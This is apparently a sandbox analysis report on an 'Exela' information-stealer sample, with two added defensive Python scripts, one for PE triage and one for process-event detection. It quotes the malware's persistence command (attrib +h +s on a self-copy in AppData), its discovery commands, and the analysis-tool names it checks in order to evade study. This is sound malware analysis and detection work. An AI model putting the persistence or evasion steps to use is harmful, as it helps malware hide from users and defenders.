            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF856C push rbp; retf 2_2_00007FFD93BF8585
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6F64 push r8; ret 2_2_00007FFD93BF6F6C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF8F63 push r12; iretd 2_2_00007FFD93BF8F7A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF8E76 push rbp; iretq 2_2_00007FFD93BF8E77
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BFA174 push rsp; ret 2_2_00007FFD93BFA175
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6E9C push rsp; iretd 2_2_00007FFD93BF6E9D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF9D95 push rsp; iretq 2_2_00007FFD93BF9D96
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 81_2_00007FFD33056329 push ecx; ret 81_2_00007FFD3305632C
            Source: initial sample Static PE information: section name: UPX0
            Source: initial sample Static PE information: section name: UPX1
            (The report lists this UPX0/UPX1 pair 31 times.)
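The UPX0/UPX1/UPX2 section names and the embedded .pdb paths listed above are static artefacts that can be pulled from a file without running it. The script below is an added example, not part of the Joe Sandbox report and not code from the Exela sample: it parses the PE section table by hand, flags the packer section names the report cites, and extracts drive-letter .pdb paths from the raw bytes. The PE image it builds for its self-check is constructed inline and is not the analysed sample.

```python
"""pe_triage.py: static checks mirroring two of the report's signatures.

Added example, not from the Joe Sandbox report or from the Exela sample.
"""
from __future__ import annotations

import re
import struct
import sys

# Section names the report flags. UPX0/UPX1 are the classic UPX names;
# UPX2 shows up on some UPX-packed DLLs (libffi-7.dll, _rust.pyd above).
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}

# Drive-letter path ending in .pdb, lazily matched so trailing junk such as
# "...\_lzma.pdbMM" still yields "...\_lzma.pdb".
PDB_PATH_RE = re.compile(rb"[A-Za-z]:\\[^\x00\r\n]{1,260}?\.pdb", re.IGNORECASE)


def pe_section_names(data: bytes) -> list[str]:
    """Return section names from the PE section table, in file order."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                  # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt_hdr = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_opt_hdr                     # first IMAGE_SECTION_HEADER
    names = []
    for i in range(num_sections):
        off = table + i * 40                             # 40-byte section headers
        raw = data[off:off + 8]
        if len(raw) < 8:
            raise ValueError("truncated section table")
        names.append(raw.split(b"\x00", 1)[0].decode("ascii", "replace"))
    return names


def packer_sections(data: bytes) -> list[str]:
    """Section names that match the packer names the report flags."""
    return [n for n in pe_section_names(data) if n in PACKER_SECTION_NAMES]


def pdb_paths(data: bytes) -> list[str]:
    """Unique .pdb paths found anywhere in the raw bytes, sorted."""
    return sorted({m.decode("latin-1") for m in PDB_PATH_RE.findall(data)})


def build_test_pe(section_names: list[str], tail: bytes = b"") -> bytes:
    """Constructed, non-executable PE32+ image: just enough headers for the
    section table to parse. Test input only, not the analysed sample."""
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    size_opt_hdr = 0xF0                                            # PE32+ optional header
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0,
                       size_opt_hdr, 0x22)
    opt = b"\x0b\x02" + b"\x00" * (size_opt_hdr - 2)               # magic 0x20b, rest zero
    secs = b"".join(n.encode("ascii").ljust(8, b"\x00") + b"\x00" * 32
                    for n in section_names)
    return dos + b"PE\x00\x00" + coff + opt + secs + tail


def triage(data: bytes) -> dict:
    """The three facts this example reports for one file."""
    return {
        "sections": pe_section_names(data),
        "packer_sections": packer_sections(data),
        "pdb_paths": pdb_paths(data),
    }


if __name__ == "__main__":
    if len(sys.argv) == 2:
        blob = open(sys.argv[1], "rb").read()
    else:  # no file given: run against the constructed image
        blob = build_test_pe(["UPX0", "UPX1", ".rsrc"],
                             b"\x00" + b"C:\\A\\34\\b\\bin\\amd64\\_lzma.pdbMM" + b"\x00")
    for key, value in triage(blob).items():
        print(f"{key}: {value}")
```

Run it as `python pe_triage.py <file>` to get the same three facts for a real binary. On a UPX-packed file the section names are visible on disk but most strings are not until the file is unpacked, which is consistent with the report sourcing most of the Binary string entries above from memory dumps (.sdmp) rather than from the file itself.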

            Persistence and Installation Behavior

            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_queue.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_writer.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_ssl.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\libcrypto-1_1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\multidict\_multidict.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\python3.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\unicodedata.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_parser.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\python310.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\VCRUNTIME140.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\libffi-7.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\select.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_overlapped.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_ctypes.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\libssl-1_1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\sqlite3.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_hashlib.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_multiprocessing.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_websocket.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\propcache\_helpers_c.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist\_frozenlist.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_helpers.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_socket.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_cffi_backend.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_bz2.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_lzma.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_sqlite3.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\yarl\_quoting_c.cp310-win_amd64.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_asyncio.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_decimal.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_uuid.pyd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\pyexpat.pyd
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B65830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF7B2B65830
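The attrib line above is the persistence step that matters: the stealer drops a copy of itself as %LOCALAPPDATA%\ExelaUpdateService\Exela.exe (the dropped-file entry in the same list) and then sets the hidden and system attributes on it, while cmd.exe children also run discovery commands (ipconfig /all, sc query). The script below is an added example, not part of the report and not Exela code: it runs two detection rules over process-creation events in an assumed pipe-separated format (parent PID, parent image, image, command line). The events are constructed for the example; the parent PIDs and the two benign filler events are made up.

```python
"""proc_hunt.py: flag the persistence and discovery pattern from the report
in process-creation events. Added example, not from the report or Exela."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed events (not sandbox output). Assumed format, one per line:
# parent_pid|parent_image|image|command_line. The first four mimic the
# cmd.exe children listed in the report; the last two are benign filler.
SAMPLE_EVENTS = r"""
4120|C:\Windows\System32\cmd.exe|C:\Windows\System32\attrib.exe|attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
4120|C:\Windows\System32\cmd.exe|C:\Windows\System32\ipconfig.exe|ipconfig /all
4120|C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc query type= service state= all
4120|C:\Windows\System32\cmd.exe|C:\Windows\System32\tasklist.exe|tasklist /v
2204|C:\Windows\explorer.exe|C:\Windows\System32\attrib.exe|attrib +r "C:\Users\user\Documents\notes.txt"
2204|C:\Windows\explorer.exe|C:\Windows\System32\ipconfig.exe|ipconfig /flushdns
"""


@dataclass(frozen=True)
class Event:
    parent_pid: int
    parent: str
    image: str
    cmdline: str


def parse_events(text: str) -> list[Event]:
    """Parse the assumed pipe-separated format; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ppid, parent, image, cmdline = line.split("|", 3)
        events.append(Event(int(ppid), parent, image, cmdline))
    return events


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# attrib with both +h and +s, in any order, on a path under the user's AppData.
HIDE_AND_SYSTEM = re.compile(r"(?=.*\s\+h\b)(?=.*\s\+s\b)", re.IGNORECASE)
USER_APPDATA = re.compile(r"\\Users\\[^\\]+\\AppData\\(?:Local|Roaming)\\", re.IGNORECASE)

# Discovery tools seen in the report, with the argument shape that matters.
# tasklist.exe and wmic.exe count regardless of arguments.
DISCOVERY = {
    "ipconfig.exe": re.compile(r"/all\b", re.IGNORECASE),
    "sc.exe": re.compile(r"\bquery\b", re.IGNORECASE),
    "tasklist.exe": re.compile(r""),
    "wmic.exe": re.compile(r""),
}


def hides_payload_in_appdata(ev: Event) -> bool:
    """Rule 1: attrib.exe marking a file under AppData hidden + system."""
    return (_basename(ev.image) == "attrib.exe"
            and HIDE_AND_SYSTEM.search(ev.cmdline) is not None
            and USER_APPDATA.search(ev.cmdline) is not None)


def is_discovery(ev: Event) -> bool:
    pattern = DISCOVERY.get(_basename(ev.image))
    return pattern is not None and pattern.search(ev.cmdline) is not None


def detect(events: list[Event], burst_threshold: int = 3) -> list[tuple[str, str]]:
    """Return (rule, detail) findings. Rule 1 fires per event; rule 2 fires
    once per parent PID that launches burst_threshold or more discovery tools,
    which is how the stealer's cmd.exe children cluster in the report."""
    findings: list[tuple[str, str]] = []
    discovery_by_parent: dict[int, list[str]] = defaultdict(list)
    for ev in events:
        if hides_payload_in_appdata(ev):
            findings.append(("attrib_hide_system_in_appdata", ev.cmdline))
        if is_discovery(ev):
            discovery_by_parent[ev.parent_pid].append(ev.cmdline)
    for ppid, cmds in sorted(discovery_by_parent.items()):
        if len(cmds) >= burst_threshold:
            findings.append(("discovery_burst", f"ppid {ppid}: " + "; ".join(cmds)))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(parse_events(SAMPLE_EVENTS)):
        print(f"[{rule}] {detail}")
```

On real telemetry the same two rules map onto the ParentProcessId, Image and CommandLine fields of Sysmon event ID 1 or Windows event 4688. Rule 1 is low-volume on its own because legitimate software rarely sets both +h and +s on files under a user profile; rule 2 needs the burst threshold tuned against the environment, since administrators also run ipconfig and sc query from cmd.exe.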
            Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            (In this section the report lists the WMIC.exe and tasklist.exe lines 4 times each and the powershell.exe line 58 times.)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand (repeated 2 times)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: FIDDLER.EXE0I
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "XENSERVICE.EXE"0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: QEMU-GA.EXE
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "QEMU-GA.EXE"
